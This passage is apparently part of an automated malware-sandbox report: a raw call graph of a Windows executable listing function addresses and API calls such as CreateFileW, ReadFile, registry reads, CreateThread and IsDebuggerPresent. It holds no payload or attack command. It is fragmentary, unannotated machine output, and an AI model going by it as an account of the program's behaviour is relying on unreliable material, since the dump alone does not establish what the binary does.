100918->100940 100958 8a8d68 59 API calls __getptd_noexit 100919->100958 100921 8a54cf __alloc_osfhnd @_EH4_CallFilterFunc@8 100921->100862 100926 8b0744 __alloc_osfhnd 100925->100926 100927 8a9e4b __lock 59 API calls 100926->100927 100938 8b0752 100927->100938 100928 8b07c6 100960 8b084e 100928->100960 100929 8b07cd 100965 8a8a5d 59 API calls 2 library calls 100929->100965 100932 8b07d4 100932->100928 100934 8aa06b __alloc_osfhnd 2 API calls 100932->100934 100933 8b0843 __alloc_osfhnd 100933->100914 100937 8b07fa RtlEnterCriticalSection 100934->100937 100935 8a9ed3 __mtinitlocknum 59 API calls 100935->100938 100937->100928 100938->100928 100938->100929 100938->100935 100963 8a6e8d 60 API calls __lock 100938->100963 100964 8a6ef7 RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 100938->100964 100941 8b0877 __wopenfile 100940->100941 100942 8b0891 100941->100942 100954 8b0a4c 100941->100954 100972 8a3a0b 61 API calls 2 library calls 100941->100972 100970 8a8d68 59 API calls __getptd_noexit 100942->100970 100944 8b0896 100971 8a8ff6 9 API calls __cftog_l 100944->100971 100946 8b0aaf 100967 8b87f1 100946->100967 100948 8a5540 100959 8a5562 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 100948->100959 100950 8b0a45 100950->100954 100973 8a3a0b 61 API calls 2 library calls 100950->100973 100952 8b0a64 100952->100954 100974 8a3a0b 61 API calls 2 library calls 100952->100974 100954->100942 100954->100946 100955->100910 100956->100921 100957->100921 100958->100921 100959->100921 100966 8a9fb5 RtlLeaveCriticalSection 100960->100966 100962 8b0855 100962->100933 100963->100938 100964->100938 100965->100932 100966->100962 100975 8b7fd5 100967->100975 100969 8b880a 100969->100948 100970->100944 100971->100948 100972->100950 100973->100952 100974->100954 100976 8b7fe1 __alloc_osfhnd 100975->100976 100977 8b7ff7 100976->100977 100980 8b802d 100976->100980 101059 8a8d68 59 API calls __getptd_noexit 100977->101059 100979 8b7ffc 101060 8a8ff6 9 API calls __cftog_l 100979->101060 100986 8b809e 100980->100986 100983 8b8049 101061 8b8072 RtlLeaveCriticalSection __unlock_fhandle 100983->101061 100985 8b8006 __alloc_osfhnd 100985->100969 100987 8b80be 100986->100987 100988 8a471a __wsopen_nolock 59 API calls 100987->100988 100991 8b80da 100988->100991 100989 8a9006 __invoke_watson 8 API calls 100990 8b87f0 100989->100990 100992 8b7fd5 __wsopen_helper 104 API calls 100990->100992 100993 8b8114 100991->100993 100999 8b8137 100991->100999 101008 8b8211 100991->101008 100994 8b880a 100992->100994 100995 8a8d34 __free_osfhnd 59 API calls 100993->100995 100994->100983 100996 8b8119 100995->100996 100997 8a8d68 __cftog_l 59 API calls 100996->100997 100998 8b8126 100997->100998 101000 8a8ff6 __cftog_l 9 API calls 100998->101000 101001 8b81f5 100999->101001 101006 8b81d3 100999->101006 101026 8b8130 101000->101026 101002 8a8d34 __free_osfhnd 59 API calls 101001->101002 101003 8b81fa 101002->101003 101004 8a8d68 __cftog_l 59 API calls 101003->101004 101005 8b8207 101004->101005 101007 8a8ff6 __cftog_l 9 API calls 101005->101007 101009 8ad4d4 __alloc_osfhnd 62 API calls 101006->101009 101007->101008 101008->100989 101010 8b82a1 101009->101010 101011 8b82ab 101010->101011 101012 8b82ce 101010->101012 101014 8a8d34 __free_osfhnd 59 API calls 101011->101014 101013 8b7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 101012->101013 101024 8b82f0 101013->101024 101015 8b82b0 101014->101015 101017 8a8d68 __cftog_l 59 API calls 101015->101017 101016 8b836e GetFileType 101018 8b83bb 101016->101018 101019 8b8379 GetLastError 101016->101019 101021 8b82ba 101017->101021 101032 8ad76a __set_osfhnd 60 API calls 101018->101032 101023 8a8d47 __dosmaperr 59 API calls 101019->101023 101020 8b833c GetLastError 101025 8a8d47 __dosmaperr 59 API calls 101020->101025 101022 8a8d68 __cftog_l 59 API calls 101021->101022 101022->101026 101027 8b83a0 CloseHandle 101023->101027 101024->101016 101024->101020 101028 8b7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 101024->101028 101029 8b8361 101025->101029 101026->100983 101027->101029 101030 8b83ae 101027->101030 101031 8b8331 101028->101031 101034 8a8d68 __cftog_l 59 API calls 101029->101034 101033 8a8d68 __cftog_l 59 API calls 101030->101033 101031->101016 101031->101020 101037 8b83d9 101032->101037 101035 8b83b3 101033->101035 101034->101008 101035->101029 101036 8b8594 101036->101008 101039 8b8767 CloseHandle 101036->101039 101037->101036 101038 8b1b11 __lseeki64_nolock 61 API calls 101037->101038 101056 8b845a 101037->101056 101040 8b8443 101038->101040 101041 8b7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 101039->101041 101043 8a8d34 __free_osfhnd 59 API calls 101040->101043 101040->101056 101042 8b878e 101041->101042 101045 8b87c2 101042->101045 101046 8b8796 GetLastError 101042->101046 101043->101056 101044 8b10ab 71 API calls __read_nolock 101044->101056 101045->101008 101047 8a8d47 __dosmaperr 59 API calls 101046->101047 101048 8b87a2 101047->101048 101051 8ad67d __free_osfhnd 60 API calls 101048->101051 101049 8b0d2d __close_nolock 62 API calls 101049->101056 101050 8b99f2 __chsize_nolock 83 API calls 101050->101056 101051->101045 101052 8adac6 __write 79 API calls 101052->101056 101053 8b1b11 61 API calls __lseeki64_nolock 101053->101056 101054 8b8611 101055 8b0d2d __close_nolock 62 API calls 101054->101055 101057 8b8618 101055->101057 101056->101036 101056->101044 101056->101049 101056->101050 101056->101052 101056->101053 101056->101054 101058 8a8d68 __cftog_l 59 API calls 101057->101058 101058->101008 101059->100979 101060->100985 101061->100985 101063 884ce1 101062->101063 101064 884d9d LoadLibraryA 101062->101064 101063->100868 101063->100869 101064->101063 101065 884dae GetProcAddress 101064->101065 101065->101063 101067 885003 FindResourceExW 101066->101067 101071 885020 101066->101071 101068 8bdd5c LoadResource 101067->101068 101067->101071 101069 8bdd71 SizeofResource 101068->101069 101068->101071 101070 8bdd85 LockResource 101069->101070 101069->101071 101070->101071 101071->100875 101073 885054 101072->101073 101074 8bddd4 101072->101074 101078 8a5a7d 101073->101078 101076 885062 101076->100886 101077->100875 101079 8a5a89 __alloc_osfhnd 101078->101079 101080 8a5a9b 101079->101080 101082 8a5ac1 101079->101082 101091 8a8d68 59 API calls __getptd_noexit 101080->101091 101093 8a6e4e 101082->101093 101083 8a5aa0 101092 8a8ff6 9 API calls __cftog_l 101083->101092 101088 8a5ad6 101100 8a5af8 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 101088->101100 101090 8a5aab __alloc_osfhnd 101090->101076 101091->101083 101092->101090 101094 8a6e5e 101093->101094 101095 8a6e80 RtlEnterCriticalSection 101093->101095 101094->101095 101096 8a6e66 101094->101096 101097 8a5ac7 101095->101097 101098 8a9e4b __lock 59 API calls 101096->101098 101099 8a59ee 84 API calls 4 library calls 101097->101099 101098->101097 101099->101088 101100->101090 101104 8a582d 101101->101104 101103 88508e 101103->100894 101105 8a5839 __alloc_osfhnd 101104->101105 101106 8a587c 101105->101106 101107 8a5874 __alloc_osfhnd 101105->101107 101109 8a584f _memset 101105->101109 101108 8a6e4e __lock_file 60 API calls 101106->101108 101107->101103 101111 8a5882 101108->101111 101131 8a8d68 59 API calls __getptd_noexit 101109->101131 101117 8a564d 101111->101117 101112 8a5869 101132 8a8ff6 9 API calls __cftog_l 101112->101132 101121 8a5668 _memset 101117->101121 101124 8a5683 101117->101124 101118 8a5673 101229 8a8d68 59 API calls __getptd_noexit 101118->101229 101120 8a56c3 101120->101124 101125 8a57d4 _memset 101120->101125 101134 8a4916 101120->101134 101141 8b10ab 101120->101141 101209 8b0df7 101120->101209 101231 8b0f18 59 API calls 3 library calls 101120->101231 101121->101118 101121->101120 101121->101124 101133 8a58b6 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 101124->101133 101232 8a8d68 59 API calls __getptd_noexit 101125->101232 101130 8a5678 101230 8a8ff6 9 API calls __cftog_l 101130->101230 101131->101112 101132->101107 101133->101107 101135 8a4920 101134->101135 101136 8a4935 101134->101136 101233 8a8d68 59 API calls __getptd_noexit 101135->101233 101136->101120 101138 8a4925 101234 8a8ff6 9 API calls __cftog_l 101138->101234 101140 8a4930 101140->101120 101142 8b10cc 101141->101142 101143 8b10e3 101141->101143 101244 8a8d34 59 API calls __getptd_noexit 101142->101244 101144 8b181b 101143->101144 101148 8b111d 101143->101148 101260 8a8d34 59 API calls __getptd_noexit 101144->101260 101147 8b10d1 101245 8a8d68 59 API calls __getptd_noexit 101147->101245 101151 8b1125 101148->101151 101158 8b113c 101148->101158 101149 8b1820 101261 8a8d68 59 API calls __getptd_noexit 101149->101261 101246 8a8d34 59 API calls __getptd_noexit 101151->101246 101154 8b1131 101262 8a8ff6 9 API calls __cftog_l 101154->101262 101155 8b10d8 101155->101120 101156 8b112a 101247 8a8d68 59 API calls __getptd_noexit 101156->101247 101158->101155 101159 8b1151 101158->101159 101160 8b116b 101158->101160 101163 8b1189 101158->101163 101248 8a8d34 59 API calls __getptd_noexit 101159->101248 101160->101159 101165 8b1176 101160->101165 101249 8a8a5d 59 API calls 2 library calls 101163->101249 101235 8b5ebb 101165->101235 101166 8b1199 101168 8b11bc 101166->101168 101169 8b11a1 101166->101169 101252 8b1b11 61 API calls 3 library calls 101168->101252 101250 8a8d68 59 API calls __getptd_noexit 101169->101250 101170 8b128a 101173 8b1303 ReadFile 101170->101173 101174 8b12a0 GetConsoleMode 101170->101174 101176 8b17e3 GetLastError 101173->101176 101177 8b1325 101173->101177 101178 8b1300 101174->101178 101179 8b12b4 101174->101179 101175 8b11a6 101251 8a8d34 59 API calls __getptd_noexit 101175->101251 101181 8b17f0 101176->101181 101182 8b12e3 101176->101182 101177->101176 101185 8b12f5 101177->101185 101178->101173 101179->101178 101183 8b12ba ReadConsoleW 101179->101183 101258 8a8d68 59 API calls __getptd_noexit 101181->101258 101202 8b12e9 101182->101202 101253 8a8d47 59 API calls 3 library calls 101182->101253 101183->101185 101186 8b12dd GetLastError 101183->101186 101192 8b135a 101185->101192 101194 8b15c7 101185->101194 101185->101202 101186->101182 101188 8b17f5 101259 8a8d34 59 API calls __getptd_noexit 101188->101259 101190 8a2f95 _free 59 API calls 101190->101155 101193 8b13c6 ReadFile 101192->101193 101201 8b1447 101192->101201 101196 8b13e7 GetLastError 101193->101196 101207 8b13f1 101193->101207 101195 8b16cd ReadFile 101194->101195 101194->101202 101200 8b16f0 GetLastError 101195->101200 101208 8b16fe 101195->101208 101196->101207 101197 8b1504 101203 8b14b4 MultiByteToWideChar 101197->101203 101256 8b1b11 61 API calls 3 library calls 101197->101256 101198 8b14f4 101255 8a8d68 59 API calls __getptd_noexit 101198->101255 101200->101208 101201->101197 101201->101198 101201->101202 101201->101203 101202->101155 101202->101190 101203->101186 101203->101202 101207->101192 101254 8b1b11 61 API calls 3 library calls 101207->101254 101208->101194 101257 8b1b11 61 API calls 3 library calls 101208->101257 101210 8b0e02 101209->101210 101214 8b0e17 101209->101214 101296 8a8d68 59 API calls __getptd_noexit 101210->101296 101212 8b0e07 101297 8a8ff6 9 API calls __cftog_l 101212->101297 101215 8b0e4c 101214->101215 101222 8b0e12 101214->101222 101298 8b6234 59 API calls __malloc_crt 101214->101298 101217 8a4916 __flush 59 API calls 101215->101217 101218 8b0e60 101217->101218 101263 8b0f97 101218->101263 101220 8b0e67 101221 8a4916 __flush 59 API calls 101220->101221 101220->101222 101223 8b0e8a 101221->101223 101222->101120 101223->101222 101224 8a4916 __flush 59 API calls 101223->101224 101225 8b0e96 101224->101225 101225->101222 101226 8a4916 __flush 59 API calls 101225->101226 101227 8b0ea3 101226->101227 101228 8a4916 __flush 59 API calls 101227->101228 101228->101222 101229->101130 101230->101124 101231->101120 101232->101130 101233->101138 101234->101140 101236 8b5ed3 101235->101236 101237 8b5ec6 101235->101237 101240 8b5edf 101236->101240 101241 8a8d68 __cftog_l 59 API calls 101236->101241 101238 8a8d68 __cftog_l 59 API calls 101237->101238 101239 8b5ecb 101238->101239 101239->101170 101240->101170 101242 8b5f00 101241->101242 101243 8a8ff6 __cftog_l 9 API calls 101242->101243 101243->101239 101244->101147 101245->101155 101246->101156 101247->101154 101248->101156 101249->101166 101250->101175 101251->101155 101252->101165 101253->101202 101254->101207 101255->101202 101256->101203 101257->101208 101258->101188 101259->101202 101260->101149 101261->101154 101262->101155 101264 8b0fa3 __alloc_osfhnd 101263->101264 101265 8b0fb0 101264->101265 101266 8b0fc7 101264->101266 101268 8a8d34 __free_osfhnd 59 API calls 101265->101268 101267 8b108b 101266->101267 101269 8b0fdb 101266->101269 101270 8a8d34 __free_osfhnd 59 API calls 101267->101270 101271 8b0fb5 101268->101271 101272 8b0ff9 101269->101272 101273 8b1006 101269->101273 101274 8b0ffe 101270->101274 101275 8a8d68 __cftog_l 59 API calls 101271->101275 101276 8a8d34 __free_osfhnd 59 API calls 101272->101276 101277 8b1028 101273->101277 101278 8b1013 101273->101278 101282 8a8d68 __cftog_l 59 API calls 101274->101282 101279 8b0fbc __alloc_osfhnd 101275->101279 101276->101274 101281 8ad446 ___lock_fhandle 60 API calls 101277->101281 101280 8a8d34 __free_osfhnd 59 API calls 101278->101280 101279->101220 101283 8b1018 101280->101283 101284 8b102e 101281->101284 101290 8b1020 101282->101290 101285 8a8d68 __cftog_l 59 API calls 101283->101285 101286 8b1041 101284->101286 101287 8b1054 101284->101287 101285->101290 101291 8b10ab __read_nolock 71 API calls 101286->101291 101289 8a8d68 __cftog_l 59 API calls 101287->101289 101288 8a8ff6 __cftog_l 9 API calls 101288->101279 101293 8b1059 101289->101293 101290->101288 101292 8b104d 101291->101292 101295 8b1083 __read RtlLeaveCriticalSection 101292->101295 101294 8a8d34 __free_osfhnd 59 API calls 101293->101294 101294->101292 101295->101279 101296->101212 101297->101222 101298->101215 101302 8a543a GetSystemTimeAsFileTime 101299->101302 101301 8e91f8 101301->100896 101303 8a5468 __aulldiv 101302->101303 101303->101301 101305 8a5e9c __alloc_osfhnd 101304->101305 101306 8a5eae 101305->101306 101307 8a5ec3 101305->101307 101318 8a8d68 59 API calls __getptd_noexit 101306->101318 101309 8a6e4e __lock_file 60 API calls 101307->101309 101311 8a5ec9 101309->101311 101310 8a5eb3 101319 8a8ff6 9 API calls __cftog_l 101310->101319 101320 8a5b00 68 API calls 5 library calls 101311->101320 101314 8a5ed4 101321 8a5ef4 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 101314->101321 101316 8a5ee6 101317 8a5ebe __alloc_osfhnd 101316->101317 101317->100901 101318->101310 101319->101317 101320->101314 101321->101316 101322->100773 101323->100775 101324->100826 101326 8a4a9f __alloc_osfhnd 101325->101326 101327 8a4abd 101326->101327 101328 8a4ad5 101326->101328 101329 8a4acd __alloc_osfhnd 101326->101329 101405 8a8d68 59 API calls __getptd_noexit 101327->101405 101330 8a6e4e __lock_file 60 API calls 101328->101330 101329->100838 101339 8a55e2 __alloc_osfhnd 101338->101339 101340 8a560e 101339->101340 101341 8a55f6 101339->101341 101355 8e99d2 __tzset_nolock _wcscmp 101354->101355 101356 8e949a 101355->101356 101357 88506b 75 API calls 101355->101357 101358 8e9393 GetSystemTimeAsFileTime 101355->101358 101359 885045 86 API calls 101355->101359 101356->100806 101360 8a432e 59 API calls __wsplitpath_helper 101356->101360 101357->101355 101358->101355 101359->101355 101360->100809 101361->100817 101686 881066 101691 88f8cf 101686->101691 101688 88106c 101689 8a2f80 __cinit 68 API calls 101688->101689 101690 881076 101689->101690 101692 88f8f0 101691->101692 101724 8a0143 101692->101724 101696 88f937 101697 8877c7 60 API calls 101696->101697 101698 88f941 101697->101698 101699 8877c7 60 API calls 101698->101699 101700 88f94b 101699->101700 101701 8877c7 60 API calls 101700->101701 101702 88f955 101701->101702 101703 8877c7 60 API calls 101702->101703 101704 88f993 101703->101704 101705 8877c7 60 API calls 101704->101705 101706 88fa5e 101705->101706 101734 8960e7 101706->101734 101710 88fa90 101711 8877c7 60 API calls 101710->101711 101712 88fa9a 101711->101712 101762 89ffde 101712->101762 101714 88fae1 101715 88faf1 GetStdHandle 101714->101715 101716 88fb3d 101715->101716 101717 8c49d5 101715->101717 101718 88fb45 OleInitialize 101716->101718 101717->101716 101719 8c49de 101717->101719 101718->101688 101769 8e6dda 65 API calls Mailbox 101719->101769 101721 8c49e5 101770 8e74a9 CreateThread 101721->101770 101723 8c49f1 CloseHandle 101723->101718 101771 8a021c 101724->101771 101727 8a021c 60 API calls 101728 8a0185 101727->101728 101729 8877c7 60 API calls 101728->101729 101730 8a0191 101729->101730 101731 887d2c 60 API calls 101730->101731 101732 88f8f6 101731->101732 101733 8a03a2 6 API calls 101732->101733 101733->101696 101735 8877c7 60 API calls 101734->101735 101736 8960f7 101735->101736 101737 8877c7 60 API calls 101736->101737 101738 8960ff 101737->101738 101778 895bfd 101738->101778 101741 895bfd 60 API calls 101742 89610f 101741->101742 101743 8877c7 60 API calls 101742->101743 101744 89611a 101743->101744 101745 8a0ff6 Mailbox 60 API calls 101744->101745 101746 88fa68 101745->101746 101747 896259 101746->101747 101748 896267 101747->101748 101749 8877c7 60 API calls 101748->101749 101750 896272 101749->101750 101751 8877c7 60 API calls 101750->101751 101752 89627d 101751->101752 101753 8877c7 60 API calls 101752->101753 101754 896288 101753->101754 101755 8877c7 60 API calls 101754->101755 101756 896293 101755->101756 101757 895bfd 60 API calls 101756->101757 101758 89629e 101757->101758 101759 8a0ff6 Mailbox 60 API calls 101758->101759 101760 8962a5 RegisterClipboardFormatW 101759->101760 101760->101710 101763 89ffee 101762->101763 101764 8d5cc3 101762->101764 101765 8a0ff6 Mailbox 60 API calls 101763->101765 101781 8e9d71 61 API calls 101764->101781 101767 89fff6 101765->101767 101767->101714 101768 8d5cce 101769->101721 101770->101723 101782 8e748f 66 API calls 101770->101782 101772 8877c7 60 API calls 101771->101772 101773 8a0227 101772->101773 101774 8877c7 60 API calls 101773->101774 101775 8a022f 101774->101775 101776 8877c7 60 API calls 101775->101776 101777 8a017b 101776->101777 101777->101727 101779 8877c7 60 API calls 101778->101779 101780 895c05 101779->101780 101780->101741 101781->101768 101783 881078 101788 8871eb 101783->101788 101785 88108c 101786 8a2f80 __cinit 68 API calls 101785->101786 101787 881096 101786->101787 101789 8871fb __write_nolock 101788->101789 101790 8877c7 60 API calls 101789->101790 101791 8872b1 101790->101791 101819 884864 101791->101819 101793 8872ba 101826 8a074f 101793->101826 101796 887e0b 60 API calls 101797 8872d3 101796->101797 101832 883f84 101797->101832 101800 8877c7 60 API calls 101801 8872eb 101800->101801 101802 887eec 60 API calls 101801->101802 101803 8872f4 RegOpenKeyExW 101802->101803 101804 8becda RegQueryValueExW 101803->101804 101809 887316 Mailbox 101803->101809 101805 8bed6c RegCloseKey 101804->101805 101806 8becf7 101804->101806 101805->101809 101818 8bed7e _wcscat Mailbox __wsetenvp 101805->101818 101807 8a0ff6 Mailbox 60 API calls 101806->101807 101808 8bed10 101807->101808 101810 88538e 60 API calls 101808->101810 101809->101785 101811 8bed1b RegQueryValueExW 101810->101811 101812 8bed38 101811->101812 101815 8bed52 101811->101815 101813 887d2c 60 API calls 101812->101813 101813->101815 101814 887b52 60 API calls 101814->101818 101815->101805 101816 887f41 60 API calls 101816->101818 101817 883f84 60 API calls 101817->101818 101818->101809 101818->101814 101818->101816 101818->101817 101838 8b1b90 101819->101838 101822 887f41 60 API calls 101823 884897 101822->101823 101840 8848ae 101823->101840 101825 8848a1 Mailbox 101825->101793 101827 8b1b90 __write_nolock 101826->101827 101828 8a075c GetFullPathNameW 101827->101828 101829 8a077e 101828->101829 101830 887d2c 60 API calls 101829->101830 101831 8872c5 101830->101831 101831->101796 101833 883fb4 _memmove 101832->101833 101834 883f92 101832->101834 101835 8a0ff6 Mailbox 60 API calls 101833->101835 101836 8a0ff6 Mailbox 60 API calls 101834->101836 101837 883fc8 101835->101837 101836->101833 101837->101800 101839 884871 GetModuleFileNameW 101838->101839 101839->101822 101841 8b1b90 __write_nolock 101840->101841 101842 8848bb GetFullPathNameW 101841->101842 101843 8848da 101842->101843 101844 8848f7 101842->101844 101845 887d2c 60 API calls 101843->101845 101846 887eec 60 API calls 101844->101846 101847 8848e6 101845->101847 101846->101847 101850 887886 101847->101850 101851 887894 101850->101851 101852 887e8c 60 API calls 101851->101852 101853 8848f2 101852->101853 101853->101825 101854 8a7e93 101855 8a7e9f __alloc_osfhnd 101854->101855 101891 8aa048 GetStartupInfoW 101855->101891 101857 8a7ea4 101893 8a8dbc GetProcessHeap 101857->101893 101859 8a7efc 101860 8a7f07 101859->101860 101976 8a7fe3 59 API calls 3 library calls 101859->101976 101894 8a9d26 101860->101894 101863 8a7f0d 101864 8a7f18 __RTC_Initialize 101863->101864 101977 8a7fe3 59 API calls 3 library calls 101863->101977 101915 8ad812 101864->101915 101867 8a7f27 101868 8a7f33 GetCommandLineW 101867->101868 101978 8a7fe3 59 API calls 3 library calls 101867->101978 101934 8b5173 GetEnvironmentStringsW 101868->101934 101872 8a7f32 101872->101868 101874 8a7f4d 101875 8a7f58 101874->101875 101979 8a32f5 59 API calls 3 library calls 101874->101979 101944 8b4fa8 101875->101944 101878 8a7f5e 101879 8a7f69 101878->101879 101980 8a32f5 59 API calls 3 library calls 101878->101980 101958 8a332f 101879->101958 101882 8a7f71 101883 8a7f7c __wwincmdln 101882->101883 101981 8a32f5 59 API calls 3 library calls 101882->101981 101964 88492e 101883->101964 101886 8a7f90 101887 8a7f9f 101886->101887 101982 8a3598 59 API calls _doexit 101886->101982 101983 8a3320 59 API calls _doexit 101887->101983 101890 8a7fa4 __alloc_osfhnd 101892 8aa05e 101891->101892 101892->101857 101893->101859 101984 8a33c7 RtlEncodePointer 101894->101984 101896 8a9d2b 101990 8a9f7c 101896->101990 101899 8a9d34 101994 8a9d9c 62 API calls 2 library calls 101899->101994 101902 8a9d39 101902->101863 101903 8a9d46 101903->101899 101904 8a9d51 101903->101904 101996 8a8a15 101904->101996 101906 8a9d5e 101907 8a9d93 101906->101907 102002 8aa026 TlsSetValue 101906->102002 102004 8a9d9c 62 API calls 2 library calls 101907->102004 101910 8a9d98 101910->101863 101911 8a9d72 101911->101907 101912 8a9d78 101911->101912 102003 8a9c73 59 API calls 4 library calls 101912->102003 101914 8a9d80 GetCurrentThreadId 101914->101863 101916 8ad81e __alloc_osfhnd 101915->101916 101917 8a9e4b __lock 59 API calls 101916->101917 101918 8ad825 101917->101918 101919 8a8a15 __calloc_crt 59 API calls 101918->101919 101920 8ad836 101919->101920 101921 8ad8a1 GetStartupInfoW 101920->101921 101922 8ad841 __alloc_osfhnd @_EH4_CallFilterFunc@8 101920->101922 101928 8ad8b6 101921->101928 101931 8ad9e5 101921->101931 101922->101867 101923 8adaad 102018 8adabd RtlLeaveCriticalSection _doexit 101923->102018 101925 8a8a15 __calloc_crt 59 API calls 101925->101928 101926 8ada32 GetStdHandle 101926->101931 101927 8ada45 GetFileType 101927->101931 101928->101925 101930 8ad904 101928->101930 101928->101931 101929 8ad938 GetFileType 101929->101930 101930->101929 101930->101931 101932 8aa06b __alloc_osfhnd 2 API calls 101930->101932 101931->101923 101931->101926 101931->101927 101933 8aa06b __alloc_osfhnd 2 API calls 101931->101933 101932->101930 101933->101931 101935 8a7f43 101934->101935 101936 8b5184 101934->101936 101940 8b4d6b GetModuleFileNameW 101935->101940 102019 8a8a5d 59 API calls 2 library calls 101936->102019 101938 8b51c0 FreeEnvironmentStringsW 101938->101935 101939 8b51aa _memmove 101939->101938 101941 8b4d9f _wparse_cmdline 101940->101941 101943 8b4ddf _wparse_cmdline 101941->101943 102020 8a8a5d 59 API calls 2 library calls 101941->102020 101943->101874 101945 8b4fb9 101944->101945 101947 8b4fc1 __wsetenvp 101944->101947 101945->101878 101946 8a8a15 __calloc_crt 59 API calls 101952 8b4fea __wsetenvp 101946->101952 101947->101946 101948 8b5041 101949 8a2f95 _free 59 API calls 101948->101949 101949->101945 101950 8a8a15 __calloc_crt 59 API calls 101950->101952 101951 8b5066 101953 8a2f95 _free 59 API calls 101951->101953 101952->101945 101952->101948 101952->101950 101952->101951 101955 8b507d 101952->101955 102021 8b4857 59 API calls __cftog_l 101952->102021 101953->101945 102022 8a9006 IsProcessorFeaturePresent 101955->102022 101957 8b5089 101957->101878 101960 8a333b __IsNonwritableInCurrentImage 101958->101960 102037 8aa711 101960->102037 101961 8a3359 __initterm_e 101962 8a2f80 __cinit 68 API calls 101961->101962 101963 8a3378 __cinit __IsNonwritableInCurrentImage 101961->101963 101962->101963 101963->101882 101965 884948 101964->101965 101975 8849e7 101964->101975 101966 884982 73666F36 101965->101966 102040 8a35ac 101966->102040 101970 8849ae 102052 884a5b SystemParametersInfoW SystemParametersInfoW 101970->102052 101972 8849ba 102053 883b4c 101972->102053 101975->101886 101976->101860 101977->101864 101978->101872 101982->101887 101983->101890 102005 8a3607 101984->102005 101986 8a33d8 __init_pointers __initp_misc_winsig 102006 8aa764 RtlEncodePointer 101986->102006 101988 8a33f0 __init_pointers 101989 8aa0d9 34 API calls 101988->101989 101989->101896 101993 8a9f88 101990->101993 101991 8aa06b __alloc_osfhnd 2 API calls 101991->101993 101992 8a9d30 101992->101899 101995 8a9fca TlsAlloc 101992->101995 101993->101991 101993->101992 101994->101902 101995->101903 101997 8a8a1c 101996->101997 101999 8a8a57 101997->101999 102001 8a8a3a 101997->102001 102007 8b5446 101997->102007 101999->101906 102001->101997 102001->101999 102015 8aa372 Sleep 102001->102015 102002->101911 102003->101914 102004->101910 102005->101986 102006->101988 102008 8b5451 102007->102008 102012 8b546c 102007->102012 102009 8b545d 102008->102009 102008->102012 102016 8a8d68 59 API calls __getptd_noexit 102009->102016 102010 8b547c RtlAllocateHeap 102010->102012 102013 8b5462 102010->102013 102012->102010 102012->102013 102017 8a35e1 RtlDecodePointer 102012->102017 102013->101997 102015->102001 102016->102013 102017->102012 102018->101922 102019->101939 102020->101943 102021->101952 102023 8a9011 102022->102023 102028 8a8e99 102023->102028 102027 8a902c 102027->101957 102029 8a8eb3 _memset __call_reportfault 102028->102029 102030 8a8ed3 IsDebuggerPresent 102029->102030 102036 8aa395 SetUnhandledExceptionFilter UnhandledExceptionFilter 102030->102036 102032 8ac836 __cftog_l 6 API calls 102034 8a8fba 102032->102034 102033 8a8f97 __call_reportfault 102033->102032 102035 8aa380 GetCurrentProcess TerminateProcess 102034->102035 102035->102027 102036->102033 102038 8aa714 RtlEncodePointer 102037->102038 102038->102038 102039 8aa72e 102038->102039 102039->101961 102041 8a9e4b __lock 59 API calls 102040->102041 102042 8a35b7 RtlDecodePointer RtlEncodePointer 102041->102042 102105 8a9fb5 RtlLeaveCriticalSection 102042->102105 102044 8849a7 102045 8a3614 102044->102045 102046 8a3638 102045->102046 102047 8a361e 102045->102047 102046->101970 102047->102046 102106 8a8d68 59 API calls __getptd_noexit 102047->102106 102049 8a3628 102107 8a8ff6 9 API calls __cftog_l 102049->102107 102051 8a3633 102051->101970 102052->101972 102054 883b59 __write_nolock 102053->102054 102055 8877c7 60 API calls 102054->102055 102056 883b63 GetCurrentDirectoryW 102055->102056 102108 883778 102056->102108 102058 883b8c IsDebuggerPresent 102059 883b9a 102058->102059 102060 8bd4ad MessageBoxA 102058->102060 102061 883c73 102059->102061 102063 8bd4c7 102059->102063 102064 883bb7 102059->102064 102060->102063 102062 883c7a SetCurrentDirectoryW 102061->102062 102067 883c87 Mailbox 102062->102067 102318 887373 60 API calls Mailbox 102063->102318 102189 8873e5 102064->102189 102105->102044 102106->102049 102107->102051 102109 8877c7 60 API calls 102108->102109 102110 88378e 102109->102110 102320 883d43 102110->102320 102112 8837ac 102113 884864 62 API calls 102112->102113 102114 8837c0 102113->102114 102115 887f41 60 API calls 102114->102115 102116 8837cd 102115->102116 102117 884f3d 137 API calls 102116->102117 102118 8837e6 102117->102118 102119 8bd3ae 102118->102119 102120 8837ee Mailbox 102118->102120 102362 8e97e5 102119->102362 102123 8881a7 60 API calls 102120->102123 102127 883801 102123->102127 102124 8bd3cd 102126 8a2f95 _free 59 API calls 102124->102126 102125 884faa 85 API calls 102125->102124 102128 8bd3da 102126->102128 102334 8893ea 102127->102334 102130 884faa 85 API calls 102128->102130 102132 8bd3e3 102130->102132 102136 883ee2 60 API calls 102132->102136 102133 887f41 60 API calls 102134 88381a 102133->102134 102135 888620 70 API calls 102134->102135 102137 88382c Mailbox 102135->102137 102138 8bd3fe 102136->102138 102139 887f41 60 API calls 102137->102139 102140 883ee2 60 API calls 102138->102140 102141 883852 102139->102141 102143 8bd41a 102140->102143 102142 888620 70 API calls 102141->102142 102146 883861 Mailbox 102142->102146 102144 884864 62 API calls 102143->102144 102145 8bd43f 102144->102145 102147 883ee2 60 API calls 102145->102147 102149 8877c7 60 API calls 102146->102149 102148 8bd44b 102147->102148 102150 8881a7 60 API calls 102148->102150 102151 88387f 102149->102151 102152 8bd459 102150->102152 102337 883ee2 102151->102337 102154 883ee2 60 API calls 102152->102154 102156 8bd468 102154->102156 102162 8881a7 60 API calls 102156->102162 102158 883899 102158->102132 102159 8838a3 102158->102159 102160 8a313d _W_store_winword 61 API calls 102159->102160 102161 8838ae 102160->102161 102161->102138 102163 8838b8 102161->102163 102165 8bd48a 102162->102165 102164 8a313d _W_store_winword 61 API calls 102163->102164 102167 8838c3 102164->102167 102166 883ee2 60 API calls 102165->102166 102168 8bd497 102166->102168 102167->102143 102169 8838cd 102167->102169 102168->102168 102170 8a313d _W_store_winword 61 API calls 102169->102170 102171 8838d8 102170->102171 102171->102156 102172 883919 102171->102172 102174 883ee2 60 API calls 102171->102174 102172->102156 102173 883926 102172->102173 102176 88942e 60 API calls 102173->102176 102175 8838fc 102174->102175 102178 8881a7 